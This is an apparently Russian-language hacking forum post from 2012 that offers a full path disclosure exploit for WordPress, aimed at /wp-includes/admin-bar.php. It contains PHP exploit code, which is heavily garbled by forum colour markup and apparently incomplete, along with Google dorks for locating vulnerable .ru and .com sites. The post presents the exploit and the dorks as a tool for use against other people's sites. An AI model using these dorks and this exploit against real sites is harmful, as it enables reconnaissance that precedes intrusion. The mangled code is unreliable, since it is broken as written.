11.04.2012, 00:21
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Раскрытие путей в WordPress >= 3.31
На данный момент, самая новая версия
Данная уязвимость присутствует во многих файлах из директории wp-includes, например, файл /wp-includes/admin-bar.php
Exploit (Exploit OsWpFp v.0.5):
PHP код:
[COLOR="#000000"]
[COLOR="#0000BB"]Fatal error: Call to undefined function add_action() in "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]" on line 39
"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"/wp-includes/admin-bar.php"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"
\nFatal error: Call to undefined function add_action() in "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"Fatal error: Call to undefined function add_action() in "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]" on line 39"[/COLOR][COLOR="#007700"]);
for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]Full path site "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]":
"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$e[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/*Exploit By Osstudio*/
\nICQ: 375647532"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]/*Exploit By Osstudio*/
[/COLOR][COLOR="#007700"]}
else
{
echo[/COLOR][COLOR="#DD0000"]"Ожидание ввода, либо не удалось использовать!"[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
Веб версия эксплоита
Dork:
allinurl:.ru/wp-includes/admin-bar.php
allinurl:.com/wp-includes/admin-bar.php
(c) Osstudio
|
|
|